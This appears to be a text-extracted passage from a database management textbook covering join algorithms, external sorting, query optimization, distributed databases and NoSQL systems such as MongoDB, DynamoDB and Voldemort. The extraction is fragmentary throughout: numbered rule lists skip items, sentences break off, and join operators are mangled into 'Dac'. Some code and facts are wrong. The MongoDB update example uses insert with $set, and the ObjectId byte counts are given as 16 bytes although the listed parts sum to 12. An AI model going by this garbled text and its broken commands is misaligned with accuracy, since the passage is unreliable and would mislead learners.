The index is used to look up tuples in s that will satisfy the join condition with tuple tr.
This join method is called an indexed nested-loop join and it can be used with existing indices,
as well as with temporary indices created for the sole purpose of evaluating the join. The time
cost of the join can be computed as br (tT + tS) + nr ∗ c, where nr is the number of records in
relation r, and c is the cost of a single selection on s using the join condition.
The merge-join algorithm (also called the sort-merge-join algorithm) can be used to
compute natural joins and equi-joins. Let r(R) and s(S) be the relations whose natural join is to
Database Management Systems 11.9
be computed, and let R ∩ S denote their common attributes. Join can be computed in the merge
stage in the merge–sort algorithm. These pointers point initially to the first tuple of the
respective relations. As the algorithm proceeds, the pointers move through the relation
Hybrid merge-join technique that combines indices with merge join. The hybrid merge-
join algorithm merges the sorted relation with the leaf entries of the secondary B+ tree index.
The result file contains tuples from the sorted relation and addresses for tuples of the unsorted
relation. The result file is then sorted on the addresses of tuples of the unsorted relation, allowing
efficient retrieval of the corresponding tuples, in physical storage order, to complete the join.
11.10 Query Processing and Optimization
In the hash-join algorithm, a hash function h is used to partition tuples of both relations.
The basic idea is to partition the tuples of each of the relations into sets that have the same hash
value on the join attributes.
After the partitioning of the relations, the rest of the hash-join code performs a separate
indexed nested-loop join on each of the partition pairs i, for i = 0, . . . , nh. To do so, it first
builds a hash index on each si, and then probes with tuples from ri. The relation s is the build
input, and r is the probe input. The system repeats this splitting of the input until each partition
of the build input fits in memory. Such partitioning is called recursive partitioning.
Handling of Overflows
• The number of partitions is therefore increased by a small value, called the fudge
factor that is usually about 20 percent of the number of hash partitions.
• External sorting refers to sorting algorithms that are suitable for large files of records
stored on disk that do not fit entirely in main memory.
• Use a sort-merge strategy, which starts by sorting small subfiles – called runs – of
the main file and merges the sorted runs, creating larger sorted subfiles that are
merged in turn.
• The algorithm consists of two phases: sorting phase and merging phase.
➢ Sorting phase
Runs of the file that can fit in the available buffer space are read into main memory,
sorted using an internal sorting algorithm, and written back to disk as temporary sorted
subfiles (or runs).
– nR = |b/nB|
If the available buffer size is 5 blocks and the file contains 1024 blocks, then there are 205
initial runs each of size 5 blocks. After the sort phase, 205 sorted runs are stored as
temporary subfiles on disk.
➢ Merging phase
▪ The degree of merging (dM ) is the number of runs that can be merged together in
each pass.
▪ In each pass, one buffer block is needed to hold one block from each of the runs
being merged, and one block is needed for containing one block of the merge result.
▪ dM = MIN {nB − 1, nR}, and the number of passes is |logdM (nR)|.
▪ In previous example, dM = 4, 205 runs → 52 runs → 13 runs → 4 runs → 1 run.
This means 4 passes.
▪ The complexity of external sorting (number of block accesses): (2 × b) + (2 × (b ×
(logdM b)))
For example:
– 5 initial runs [2, 8, 11], [4, 6, 7], [1, 9, 13], [3, 12, 15], [5, 10, 14].
– The available buffer nB = 3 blocks → dM = 2 (two-way merge)
– After first pass: 3 runs
[2, 4, 6, 7, 8, 11], [1, 3, 9, 12, 13, 15], [5, 10, 14]
– After second pass: 2 runs
[1, 2, 3, 4, 6, 7, 8, 9, 11, 12, 13, 15], [5, 10, 14]
– After third pass:
[1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15]
We apply heuristic rules to modify the internal representation of a query which is usually
in the form of a query tree or a query graph data structure to improve its expected performance.
The SELECT and PROJECT operations reduce the size of a file and hence should be applied
before a join or other binary operation. A query tree is used to represent a relational algebra or
extended relational algebra expression. A query graph is used to represent a relational calculus
expression.
Query Tree
A query tree is a tree data structure that corresponds to a relational algebra expression.
It represents the input relations of the query as leaf nodes of the tree, and represents the
relational algebra operations as internal nodes. An execution of the query tree consists of
executing an internal node operation whenever its operands are available and then replacing
Database Management Systems 11.13
that internal node by the relation that results from executing the operation. The order of
execution of operations starts at the leaf nodes which represents the input database relations for
the query, and ends at the root node, which represents the final operation of the query. The
execution terminates when the root node operation is executed and produces the result relation
for the query.
Query Graph
Relations in the query are represented by relation nodes, which are displayed as single
circles. Constant values, typically from the query selection conditions, are represented by
constant nodes, which are displayed as double circles or ovals. Selection and join conditions
are represented by the graph edges. The attributes to be retrieved from each relation are
displayed in square brackets above each relation. The query graph does not indicate an order on
which operations to perform first. There is only a single graph corresponding to each query.
Hence, a query graph corresponds to a relational calculus expression. Example:
11.14 Query Processing and Optimization
1. Cascade of σ:
σ c1 and c2 and ... and cn (R) ≡ σc1 (σc2 (. . . (σcn (R)) . . .))
2. Commutativity of σ:
3. Cascade of π:
R Dac S ≡ S Dac R R × S ≡ S × R
6. Commuting σ with Da (or ×): If the selection condition c can be written as (c1 and
c2), where c1 involves only the attributes of R and c2 involves only the attributes of S.
7. Commuting π with Da (or ×): Suppose the projection list L = {A1, . . . , An, B1, . . . ,
Bm}, where A1, . . . , An are attributes of R and B1, . . . , Bm are attributes of S
∗ If the join condition c involves only attributes in L. πL (R Dac S) ≡ (πA1 ,...,An (R))
Dac (πB1 ,...,Bm (S))
πL (R Dac S) ≡ πL ((πA1 ,...,An,An+1 ,...,An+k (R)) Dac (πB1 ,...,Bm ,Bm+1 ,...,Bm+p (S)))
Database Management Systems 11.15
10. Commuting σ with set operations: Let θ be one of the three set operations ∩, ∪,
and −.σc(R θ S) ≡ (σc(R)) θ (σc(S))
not (c1 and c2) ≡ (not c1) or (not c2) not (c1 or c2) ≡ (not c1) and (not c2)
1. Break up the SELECT operations: Using rule 1, break up any SELECT operations
with conjunctive conditions into a cascade of SELECT operations.
2. Push down the SELECT operations: Using rules 2, 4, 6, and 10 concerning the
commutativity of SELECT with other operations, move each SELECT operation
as far down the tree as is permitted by the attributes involved in the select
condition.
3. Rearrange the leaf nodes: Using rules 5 and 9 concerning commutativity and
associativity of binary operations, rearrange the leaf nodes of the tree using the
following criteria.
▪ Position the leaf node relations with most restrictive SELECT operations so
they are executed first in the query tree.
▪ Make sure that the ordering of leaf nodes does not cause CARTESIAN
PRODUCT operations.
A query optimizer does not depend solely on heuristic rules. It also estimates and
compares the costs of executing a query using different execution strategies and algorithms.
Then chooses the strategy with the lowest cost estimate. Compiled queries where the
optimization is done at compile time and the resulting execution strategy code is stored and
executed directly at runtime. For interpreted queries, where the entire process occurs at run
time.
• Access cost to secondary storage - This is the cost of transferring (reading and writing)
data blocks between secondary disk storage and main memory buffers. This is also
known as disk I/O (input/output) cost.
2. Disk storage cost - This is the cost of storing on disk any intermediate files that are
generated by an execution strategy for the query.
3. Computation cost - This is the cost of performing in-memory operations on the records
within the data buffers during query execution. Such operations include searching for
and sorting records, merging records for a join or a sort operation, and performing
computations on field values. This is also known as CPU (central processing unit) cost.
4. Memory usage cost - This is the cost pertaining to the number of main memory buffers
needed during query execution.
5. Communication cost - This is the cost of shipping the query and its results from the
database site to the site or terminal where the query originated.
Database Management Systems 11.17
For a file whose records are all of the same type, the number of records (tuples) (r),
the (average) record size (R), and the number of file blocks (b) (or close estimates of them)
are needed.
• The blocking factor (bfr) for the file may also be needed.
• The primary file organization records may be unordered, ordered by an attribute with
or without a primary or clustering index, or hashed (static hashing or one of the dynamic
hashing methods) on a key attribute.
• Information is also kept on all primary, secondary, or clustering indexes and their
indexing attributes.
• The number of levels (x) of each multilevel index (primary, secondary, or clustering) is
needed for cost functions that estimate the number of block accesses that occur during
query execution.
• In some cost functions the number of first-level index blocks (bI1) is needed.
• Another important parameter is the number of distinct values (d) of an attribute and the
attribute selectivity (sl), which is the fraction of records satisfying an equality condition
on the attribute.
• This allows estimation of the selection cardinality (s = sl*r) of an attribute, which is the
average number of records that will satisfy an equality selection condition on that
attribute.
A new temporary relation is created after each join operation. Both the join method and
the access methods for the input relations must be determined. The access method is a table
scan (that is, a linear search). The PROJECT relation will have the selection operation
performed before the join, so two options exist and table scan (linear search) and the optimizer
11.18 Query Processing and Optimization
must compare their estimated costs. Here, the overall cost of the algorithm is composed by
adding the cost of individual index scans and cost of fetching the records in the intersection of
the retrieved lists of pointers. We can minimize the cost by sorting the list of pointers and
fetching the sorted records. So, we found the following two points for cost estimation
• We can fetch all selected records of the block using a single I/O operation because each
pointer in the block appears together.
• The disk-arm movement gets minimized as blocks are read in sorted order.
Here, br is the number of blocks in the file, hi denotes the height of the B+- tree, b is the
number of blocks holding records with specified search key, n is the number of fetched records,
tT – average time taken by disk subsystem to transfer a block of data and tS - average block-
access time (disk seek time plus rotational latency).
Linear Search, Equality ts + (br/2) * tT It is the average case where it needs only one
on Key record satisfying the condition. So as soon as it
is found, the scan terminates.
Primary B+-tree index, (hi +1) * (tT + Each I/O operation needs one seek and one block
Equality on Key t S) transfer to fetch the record by traversing the
height of the tree.
Primary B+-tree index, hi * (tT + ts) + It needs one seek for each level of the tree, and
Equality on a Nonkey b * tT one seek for the first block.
Secondary B+-tree index, (hi + 1) * Each I/O operation needs one seek and one block
Equality on Key (tT + tS) transfer to fetch the record by traversing the
height of the tree.
Database Management Systems 11.19
Secondary B+-tree index, (hi + n) * It requires one seek per record because each
Equality on Nonkey (tT + tS) record may be on a different block.
Primary B+-tree index, hi * (tT + tS) + It needs one seek for each level of the tree, and
Comparison b * tT one seek for the first block.
Secondary B+-tree index, (hi + n) * It requires one seek per record because each
Comparison (tT + tS) record may be on a different block.
CHAPTER – XII
DISTRIBUTED DATABASES
12.1. INTRODUCTION
For a database to be called distributed, the following minimum conditions should be satisfied:
• Possible absence of homogeneity among connected nodes: It is not necessary that all
nodes be identical in terms of data, hardware, and software.
12.1.1. Transparency
In a DDB scenario, the data and software are distributed over multiple nodes connected
by a computer network. So, additional types of transparencies are needed as listed below:
o Location transparency refers to the fact that the command used to perform a task
is independent of the location of the data and the location of the node where the
command was issued.
o Naming transparency implies that once a name is associated with an object, the
named objects can be accessed unambiguously without additional specification as
to where the data is located.
• Replication transparency: Copies of the same data objects may be stored at multiple
sites for better availability, performance, and reliability. Replication transparency makes
the user unaware of the existence of these copies.
• Fragmentation transparency: Two types of fragmentation are possible.
o Horizontal fragmentation distributes a relation (table) into subrelations that are
subsets of the tuples (rows) in the original relation; this is also known as sharding
in the newer big data and cloud computing systems.
o Vertical fragmentation distributes a relation into subrelations where each
subrelation is defined by a subset of the columns of the original relation.
Fragmentation transparency makes the user unaware of the existence of fragments.
Other transparencies include design transparency and execution transparency—which
refer, respectively, to freedom from knowing how the distributed database is designed and
where a transaction executes.
12.1.2. Availability and Reliability
Reliability and availability are two of the most common potential advantages cited for
distributed databases. Reliability is broadly defined as the probability that a system is running
(not down) at a certain time point, whereas availability is the probability that the system is
continuously available during a time interval. We can directly relate reliability and availability
of the database to the faults, errors, and failures associated with it. A failure can be described
as a deviation of a system’s behavior from that which is specified in order to ensure correct
execution of operations.
Errors constitute that subset of system states that causes the failure. Fault is the cause of
an error.
To construct a system that is reliable, we can adopt several approaches. One common
approach stresses fault tolerance; it recognizes that faults will occur, and it designs mechanisms
that can detect and remove faults before they can result in a system failure. Another more
stringent approach attempts to ensure that the final system does not contain any faults. This is
done through an exhaustive design process followed by extensive quality control and testing.
Database Management Systems 12.3
Scalability determines the extent to which the system can expand its capacity while
continuing to operate without interruption. There are two types of scalability:
• Horizontal scalability: This refers to expanding the number of nodes in the distributed
system. As nodes are added to the system, it should be possible to distribute some of the
data and processing loads from existing nodes to the new nodes.
• Vertical scalability: This refers to expanding the capacity of the individual nodes in the
system, such as expanding the storage capacity or the processing power of a node.
The concept of partition tolerance states that the system should have the capacity to
continue operating while the network is partitioned.
12.1.4. Autonomy
Autonomy determines the extent to which individual nodes or DBs in a connected DDB
can operate independently. A high degree of autonomy is desirable for increased flexibility and
customized maintenance of an individual node. Autonomy can be applied to design,
communication, and execution.
• Communication autonomy determines the extent to which each node can decide on
sharing of information with other nodes.
2. Increased availability: This is achieved by the isolation of faults to their site of origin
without affecting the other database nodes connected to the network so that the data and
software that exist at the failed site cannot be accessed. Further improvement is achieved
by judiciously replicating data and software at more than one site.
12.4 Distributed Databases
There are number of types of DDBMSs based on various criteria and factors. The factors
that make some of these systems different are
• Degree of homogeneity of the DDBMS software: If all servers (or individual local
DBMSs) use identical software and all users (clients) use identical software, the
DDBMS is called homogeneous; otherwise, it is called heterogeneous.
• Degree of local autonomy: If there is no provision for the local site to function as a
standalone DBMS, then the system has no local autonomy. On the other hand, if direct
access by local transactions to a server is permitted, the system has some degree of local
autonomy.
• Point A: For a centralized database, there is complete autonomy but a total lack of
distribution and heterogeneity.
• Point B: At one extreme of the autonomy spectrum, we have a DDBMS that looks like
a centralized DBMS to the user, with zero autonomy.
The degree of local autonomy provides further ground for classification into federated
and multidatabase systems.
• Point C: The term federated database system (FDBS) is used when there is some global
view or schema of the federation of databases that is shared by the applications.
• Point D: On the other hand, a multidatabase system has full local autonomy in that it
does not have a global schema but interactively constructs one as needed by the
application.
Database Management Systems 12.5
There are two main types of multiprocessor system architectures that are commonplace:
• Shared disk (loosely coupled) architecture. Multiple processors share secondary (disk)
storage but each has their own primary memory.
Figure 12.2: Some different database system architectures. (a) Shared-nothing architecture
In this section, we discuss both the logical and component architectural models of a
DDB. In Figure 12.3, which describes the generic schema architecture of a DDB, the enterprise
is presented with a consistent, unified view showing the logical structure of underlying data
across all nodes. This view is represented by the global conceptual schema (GCS), which
provides network transparency.
The logical organization of data at each site is specified by the local conceptual schema
(LCS). The GCS, LCS, and their underlying mappings provide the fragmentation and
replication transparency.
Each local DBMS would have its local query optimizer, transaction manager, and
execution engines as well as the local system catalog, which houses the local schemas. The
global transaction manager is responsible for coordinating the execution across multiple sites
in conjunction with the local transaction manager at those sites.
12.8 Distributed Databases
• Component schema is derived by translating the local schema into a canonical data
model or common data model (CDM) for the FDBS.
• Export schema represents the subset of a component schema that is available to the
FDBS.
• Federated schema is the global schema or view, which is the result of integrating all the
shareable export schemas.
• External schemas define the schema for a user group or an application, as in the three-
level schema architecture.
Figure 12.4: The five-level schema architecture in a federated database system (FDBS)
Database Management Systems 12.9
In a DDB, decisions must be made regarding which site should be used to store which
portions of the database. For now, we will assume that there is no replication; that is, each
relation—or portion of a relation—is stored at one site only.
Before we decide on how to distribute the data, we must determine the logical units of
the database that are to be distributed. The simplest logical units are the relations themselves;
that is, each whole relation is to be stored at a particular site. In our example, we must decide
on a site to store each of the relations EMPLOYEE, DEPARTMENT, PROJECT,
WORKS_ON, and DEPENDENT. In many cases, however, a relation can be divided into
smaller logical units for distribution. For example, consider the company database and assume
there are three computer sites—one for each department in the company. We may want to store
the database information relating to each department at the computer site for that department.
A technique called horizontal fragmentation or sharding can be used to partition each relation
by department.
A horizontal fragment or shard of a relation is a subset of the tuples in that relation. The
tuples that belong to the horizontal fragment can be specified by a condition on one or more
attributes of the relation, or by some other mechanism. For example, we may define three
horizontal fragments on the EMPLOYEE relation with the following conditions: (Dno = 5),
(Dno = 4), and (Dno = 1)—each fragment contains the EMPLOYEE tuples working for a
particular department. Similarly, we may define three horizontal fragments for the PROJECT
relation, with the conditions (Dnum = 5), (Dnum = 4), and (Dnum = 1) - each fragment contains
the PROJECT tuples controlled by a particular department. Horizontal fragmentation divides a
relation horizontally by grouping rows to create subsets of tuples, where each subset has a
certain logical meaning. These fragments can then be assigned to different sites (nodes) in the
distributed system.
Each site may not need all the attributes of a relation, which would indicate the need for
a different type of fragmentation. Vertical fragmentation divides a relation “vertically” by
columns. A vertical fragment of a relation keeps only certain attributes of the relation. For
example, we may want to fragment the EMPLOYEE relation into two vertical fragments. The
first fragment includes personal information—Name, Bdate, Address, and Sex—and the second
includes work-related information—Ssn, Salary, Super_ssn, and Dno. A vertical fragment on a
relation R can be specified by a πLi (R) operation in the relational algebra. A set of vertical
fragments whose projection lists L1, L2, … , Ln include all the attributes in R but share only the
primary key attribute of R is called a complete vertical fragmentation of R. In this case the
projection lists satisfy the following two conditions:
• L1 ∪ L2 ∪ … ∪ Ln = ATTRS(R)
• Li ∩ Lj = PK(R) for any i ≠ j, where ATTRS(R) is the set of attributes of R and PK(R)
is the primary key of R
We can intermix the two types of fragmentation, yielding a mixed fragmentation. For
example, we may combine the horizontal and vertical fragmentations of the EMPLOYEE
relation given earlier into a mixed fragmentation that includes six fragments. In this case, the
original relation can be reconstructed by applying UNION and OUTER UNION (or OUTER
JOIN) operations in the appropriate order.
The global and local transaction management software modules, along with the
concurrency control and recovery manager of a DDBMS, collectively guarantee the ACID
properties of transactions. An additional component called the global transaction manager is
introduced for supporting distributed transactions. The site where the transaction originated can
12.12 Distributed Databases
temporarily assume the role of global transaction manager and coordinate the execution of
database operations with transaction managers across multiple sites. The operations exported
by this interface are BEGIN_TRANSACTION, READ or WRITE, END_TRANSACTION,
COMMIT_TRANSACTION, and ROLLBACK (or ABORT).
• For WRITE operations, it ensures that updates are visible across all sites containing
copies (replicas) of the data item.
• For ABORT operations, the manager ensures that no effects of the transaction are
reflected in any site of the distributed database.
• For COMMIT operations, it ensures that the effects of a write are persistently recorded
on all databases containing copies of the data item.
The transaction manager passes to the concurrency controller module the database
operations and associated information. The controller is responsible for acquisition and release
of associated locks. If the transaction requires access to a locked resource, it is blocked until the
lock is acquired. Once the lock is acquired, the operation is sent to the runtime processor, which
handles the actual execution of the database operation. Once the operation is completed, locks
are released and the transaction manager is updated with the result of the operation.
We described the two-phase commit protocol (2PC), which requires a global recovery
manager, or coordinator, to maintain information needed for recovery, in addition to the local
recovery managers and the information they maintain (log, tables). The two-phase commit
protocol has certain drawbacks that led to the development of the three-phase commit protocol.
The biggest drawback of 2PC is that it is a blocking protocol. Failure of the coordinator
blocks all participating sites, causing them to wait until the coordinator recovers. This can cause
performance degradation, especially if participants are holding locks to shared resources. Other
types of problems may also occur that make the outcome of the transaction nondeterministic.
These problems are solved by the three-phase commit (3PC) protocol, which essentially divides
the second commit phase into two subphases called prepare-to-commit and commit. The main
idea is to limit the wait time for participants who have prepared to commit and are waiting for
a global commit or abort from the coordinator. When a participant receives a precommit
message, it knows that the rest of the participants have voted to commit. If a precommit message
has not been received, then the participant will abort and release all locks
Database Management Systems 12.13
Now we give an overview of how a DDBMS processes and optimizes a query. First we
discuss the steps involved in query processing and then elaborate on the communication costs
of processing a distributed query. Then we discuss a special operation, called a semijoin, which
is used to optimize some types of queries in a DDBMS.
1. Query Mapping: The input query on distributed data is specified formally using a query
language. It is then translated into an algebraic query on global relations. This translation
is done by referring to the global conceptual schema and does not take into account the
actual distribution and replication of data. Hence, this translation is largely identical to
the one performed in a centralized DBMS. It is first normalized, analyzed for semantic
errors, simplified, and finally restructured into an algebraic query.
4. Local Query Optimization: This stage is common to all sites in the DDB. The
techniques are similar to those used in centralized systems.
The first three stages discussed above are performed at a central control site, whereas
the last stage is performed locally.
12.14 Distributed Databases
We illustrate this with two simple sample queries. Suppose that the EMPLOYEE and
DEPARTMENT relations are distributed at two sites as shown in Figure 12.4. We will assume
in this example that neither relation is fragmented. The size of the EMPLOYEE relation is 100
* 10,000 = 106 bytes, and the size of the DEPARTMENT relation is 35 * 100 = 3,500 bytes.
Consider the query Q: For each employee, retrieve the employee name and the name of
the department for which the employee works. This can be stated as follows in the relational
algebra: Q: πFname, Lname, Dname(EMPLOYEE ⋈Dno=Dnumber DEPARTMENT)
The result of this query will include 10,000 records, assuming that every employee is
related to a department. Suppose that each record in the query result is 40 bytes long. The query
is submitted at a distinct site 3, which is called the result site because the query result is needed
there. Neither the EMPLOYEE nor the DEPARTMENT relations reside at site 3. There are
three simple strategies for executing this distributed query:
Database Management Systems 12.15
1. Transfer both the EMPLOYEE and the DEPARTMENT relations to the result site, and
perform the join at site 3. In this case, a total of 1,000,000 + 3,500 = 1,003,500 bytes
must be transferred.
2. Transfer the EMPLOYEE relation to site 2, execute the join at site 2, and send the result
to site 3. The size of the query result is 40 * 10,000 = 400,000 bytes, so 400,000 +
1,000,000 = 1,400,000 bytes must be transferred.
3. Transfer the DEPARTMENT relation to site 1, execute the join at site 1, and send the
result to site 3. In this case, 400,000 + 3,500 = 403,500 bytes must be transferred.
If minimizing the amount of data transfer is our optimization criterion, we should choose
strategy 3.
A more complex strategy, which sometimes works better than these simple strategies,
uses an operation called semijoin.
The idea behind distributed query processing using the semijoin operation is to reduce
the number of tuples in a relation before transferring it to another site. Intuitively, the idea is to
send the joining column of one relation R to the site where the other relation S is located; this
column is then joined with S. Following that, the join attributes, along with the attributes
required in the result, are projected out and shipped back to the original site and joined with R.
Hence, only the joining column of R is transferred in one direction, and a subset of S with no
extraneous tuples or attributes is transferred in the other direction. If only a small fraction of the
tuples in S participate in the join, this can be an efficient solution to minimizing data transfer.
1. Project the join attributes of DEPARTMENT at site 2, and transfer them to site 1. For
Q, we transfer F = πDnumber(DEPARTMENT), whose size is 4 * 100 = 400 Bytes.
2. Join the transferred file with the EMPLOYEE relation at site 1, and transfer the required
attributes from the resulting file to site 2. For Q, we transfer R = πDno, Fname, Lname(F
⋈Dnumber=Dno EMPLOYEE), whose size is 34 * 10,000 = 340,000 bytes.
3. Execute the query by joining the transferred file R with DEPARTMENT, and present
the result to the user at site 3.
Using this strategy, we transfer 340,400 bytes for Q. We limited the EMPLOYEE
attributes and tuples transmitted to site 2 in step 2 to only those that will actually be joined with
a DEPARTMENT tuple in step 3.
CHAPTER – XIII
NOSQL DATABASES
13.1. INTRODUCTION
The term NOSQL is generally interpreted as Not Only SQL—rather than NO to SQL—
and is meant to convey that many applications need systems other than traditional relational
SQL systems to augment their data management needs. Most NOSQL systems are distributed
databases or distributed storage systems, with a focus on semistructured data storage, high
performance, availability, data replication, and scalability as opposed to an emphasis on
immediate data consistency, powerful query languages, and structured data storage.
Consider a free e-mail application, such as Google Mail. There is a need for a storage
system that can manage all these e-mails. A structured relational SQL system may not be
appropriate because
• SQL systems offer too many services (powerful query language, concurrency control,
etc.), which this application may not need
• A structured data model such the traditional relational model may be too restrictive.
Although newer relational systems do have more complex object relational modelling
options, they still require schemas, which are not required by many of the NOSQL systems.
Some of the organizations that were faced with these data management and storage
applications decided to develop their own systems:
known as column-based or wide column stores; they are also sometimes referred to as
column family stores.
• Facebook developed a NOSQL system called Cassandra, which is now open source and
known as Apache Cassandra. This NOSQL system uses concepts from both key-value
stores and column-based systems.
• Other software companies started developing their own solutions and making them
available to users who need these capabilities—for example, MongoDB and CouchDB,
which are classified as document-based NOSQL systems or document stores.
• Some NOSQL systems, such as OrientDB, combine concepts from many of the
categories discussed above.
• NOSQL systems emphasize high availability, so replicating the data is inherent in many
of these systems.
• Scalability is another important characteristic, because many of the applications that use
NOSQL systems tend to have data that keeps growing in volume.
NOSQL systems emphasize performance and flexibility over modeling power and
complex querying.
Not Requiring a Schema: The flexibility of not requiring a schema is achieved in many
NOSQL systems by allowing semi-structured, self-describing data.
Database Management Systems 13.3
Less Powerful Query Languages: Many applications that use NOSQL systems may not
require a powerful query language such as SQL, because search (read) queries in these systems
often locate single objects in a single file based on their object keys. NOSQL systems typically
provide a set of functions and operations as a programming API (application programming
interface), so reading and writing the data objects is accomplished by calling the appropriate
operations by the programmer. In many cases, the operations are called CRUD operations, for
Create, Read, Update, and Delete. In other cases, they are known as SCRUD because of an
added Search (or Find) operation.
Versioning: Some NOSQL systems provide storage of multiple versions of the data
items, with the timestamps of when the data version was created.
NOSQL systems have been characterized into four major categories, with some
additional categories that encompass other types of systems. They are
1. Document-based NOSQL systems: These systems store data in the form of documents
using well-known formats, such as JSON (JavaScript Object Notation). Documents are
accessible via their document id, but can also be accessed rapidly using other indexes.
2. NOSQL key-value stores: These systems have a simple data model based on fast access
by the key to the value associated with the key; the value can be a record or an object or
a document or even have a more complex data structure.
4. Graph-based NOSQL systems: Data is represented as graphs, and related nodes can be
found by traversing the edges using path expressions.
The three letters in CAP refer to three desirable properties of distributed systems with
replicated data: consistency (among replicated copies), availability (of the system for read and
write operations) and partition tolerance (in the face of the nodes in the system being partitioned
by a network fault). Availability means that each read or write request for a data item will either
be processed successfully or will receive a message that the operation cannot be completed.
Partition tolerance means that the system can continue operating if the network connecting the
nodes has a fault that results in two or more partitions, where the nodes in each partition can
13.4 NOSQL Databases
only communicate among each other. Consistency means that the nodes will have the same
copies of a replicated data item visible for various transactions.
The CAP theorem states that it is not possible to guarantee all three of the desirable
properties consistency, availability, and partition tolerance at the same time in a distributed
system with data replication. If this is the case, then the distributed system designer would have
to choose two properties out of the three to guarantee. It is generally assumed that in many
traditional (SQL) applications, guaranteeing consistency through the ACID properties is
important.
On the other hand, in a NOSQL distributed data store, a weaker consistency level is
often acceptable, and guaranteeing the other two properties (availability, partition tolerance) is
important. Hence, weaker consistency levels are often used in NOSQL system instead of
guaranteeing serializability. In particular, a form of consistency known as eventual consistency
is often adopted in NOSQL systems.
MongoDB documents are stored in BSON (Binary JSON) format, which is a variation
of JSON with some additional data types and is more efficient for storage than JSON. Individual
documents are stored in a collection. We will use a simple example based on our COMPANY.
The operation createCollection is used to create each collection. For example, the following
command can be used to create a collection called project to hold PROJECT objects from the
COMPANY database:
The command to create another document collection called worker to hold information
about the EMPLOYEEs who work on each project is
db.createCollection(“worker”, { capped : true, size : 5242880, max : 2000 } ) )
The first parameter “project” is the name of the collection, which is followed by an
optional document that specifies collection options. In our example, the collection is capped;
this means it has upper limits on its storage space (size) and number of documents (max). The
capping parameters help the system choose the storage options for each collection.
Each document in a collection has a unique ObjectId field, called _id, which is
automatically indexed in the collection unless the user explicitly requests no index for the _id
field. The value of ObjectId can be specified by the user, or it can be system-generated if the
user does not specify an _id field for a particular document. System-generated ObjectIds have
a specific format, which combines the timestamp when the object is created (4 bytes, in an
internal MongoDB format), the node id (3 bytes), the process id (2 bytes), and a counter (3
bytes) into a 16-byte Id value. User-generated ObjectsIds can have any value specified by the
user as long as it uniquely identifies the document and so these Ids are similar to primary keys
in relational systems.
A collection does not have a schema. The structure of the data fields in documents is
chosen based on how documents will be accessed and used, and the user can choose a
normalized design (similar to normalized relational tuples) or a denormalized design (similar
to XML documents or complex objects). Interdocument references can be specified by storing
in one document the ObjectId or ObjectIds of other related documents.
13.3.2 MongoDB CRUD Operations
MongoDb has several CRUD operations, where CRUD stands for (create, read, update,
delete). Documents can be created and inserted into their collections using the insert operation,
whose format is:
db.<collection_name>.insert(<document(s)>)
E.g. db.project.insert( { _id: “P1”, Pname: “ProductX”, Plocation: “Bellaire” })
db.worker.insert( [ { _id: “W1”, Ename: “John Smith”, ProjectId: “P1”, Hours: 32.5 },
{_id: “W2”, Ename: “Joyce English”, ProjectId: “P1”, Hours: 20.0} ] )
}
{ _id: “W2”,
Ename: “Joyce English”,
Hours: 20.0
}
3. A third option would use a normalized design, similar to First Normal Form relations.
The choice of which design option to use depends on how the data will be accessed.
E.g. Normalized project and worker documents (not a fully normalized design for M:N
relationships):
{
_id: “P1”,
Pname: “ProductX”,
Plocation: “Bellaire”
}
{ _id: “W1”,
Ename: “John Smith”,
ProjectId: “P1”,
Hours: 32.5
}
The parameters of the insert operation can include either a single document or an array of
documents. The delete operation is called remove, and the format is:
db.<collection_name>.remove(<condition>)
E.g. db.project.remove({Plocation: “Chennai”})
There is also an update operation, which has a condition to select certain documents, and
a $set clause to specify the update. It is also possible to use the update operation to replace
an existing document with another one but keep the same ObjectId.
E.g. To update the project location, the command used is
db.project.insert( { _id: “P1”, Pname: “ProductX”, $set:{Plocation: “Chennai”}})
For read queries, the main command is called find, and the format is:
db.<collection_name>.find(<condition>)
E.g. db.project.find({Plocation: “Chennai”})
13.8 NOSQL Databases
Key-value stores focus on high performance, availability, and scalability by storing data
in a distributed storage system. The data model used in key-value stores is relatively simple,
and in many of these systems, there is no query language but rather a set of operations that can
be used by the application programmers. The key is a unique identifier associated with a data
item and is used to locate this data item rapidly. The value is the data item itself, and it can have
very different formats for different key-value storage systems. In some cases, the value is just
a string of bytes or an array of bytes, and the application using the key-value store has to
interpret the structure of the data value. In other cases, some standard formatted data is allowed;
for example, structured data rows (tuples) similar to relational data, or semi structured data
using JSON or some other self-describing data format.
Different key-value stores can thus store unstructured, semi structured, or structured
data items. The main characteristic of key-value stores is the fact that every value (data item)
must be associated with a unique key, and that retrieving the value by supplying the key must
be very fast. There are many systems that fall under the key-value store label. Let us have a
brief introductory overview for some of these systems and their characteristics.
The basic data model in DynamoDB uses the concepts of tables, items, and attributes.
A table in DynamoDB does not have a schema; it holds a collection of self-describing items.
Each item will consist of a number of (attribute, value) pairs, and attribute values can be single-
valued or multivalued. So basically, a table will hold a collection of items, and each item is a
self-describing record (or object). DynamoDB also allows the user to specify the items in JSON
format, and the system will convert them to the internal storage format of DynamoDB.
When a table is created, it is required to specify a table name and a primary key; the
primary key will be used to rapidly locate the items in the table. Thus, the primary key is the
key and the item is the value for the DynamoDB key-value store.
The primary key attribute must exist in every item in the table. The primary key can be
one of the following two types:
• A single attribute. The DynamoDB system will use this attribute to build a hash index
on the items in the table. This is called a hash type primary key. The items are not
ordered in storage on the value of the hash attribute.
Database Management Systems 13.9
• A pair of attributes. This is called a hash and range type primary key. The primary key
will be a pair of attributes (A, B): attribute A will be used for hashing, and because there
will be multiple items with the same value of A, the B values will be used for ordering
the records with the same A value. A table with this type of key can have additional
secondary indexes defined on its attributes. For example, if we want to store multiple
versions of some type of items in a table, we could use ItemID as hash and Date or
Timestamp (when the version was created) as range in a hash and range type primary
key.
Voldemort is an open source system available through Apache 2.0 open source licensing
rules. It is based on Amazon’s DynamoDB. The focus is on high performance and horizontal
scalability, as well as on providing replication for high availability and sharding for improving
latency (response time) of read and write requests. All three of those features - replication,
sharding, and horizontal scalability—are realized through a technique to distribute the key-
value pairs among the nodes of a distributed cluster; this distribution is known as consistent
hashing. Voldemort has been used by LinkedIn for data storage. Some of the features of
Voldemort are as follows:
• Simple basic operations: A collection of (key, value) pairs is kept in a Voldemort store.
• High-level formatted data values: The values v in the (k, v) items can be specified in
JSON (JavaScript Object Notation), and the system will convert between JSON and the
internal storage format. Other data object formats can also be specified if the application
provides the conversion (also known as serialization) between the user format and the
storage format as a Serializer class.
• Consistent hashing for distributing (key, value) pairs: A variation of the data distribution
algorithm known as consistent hashing is used in Voldemort for data distribution among
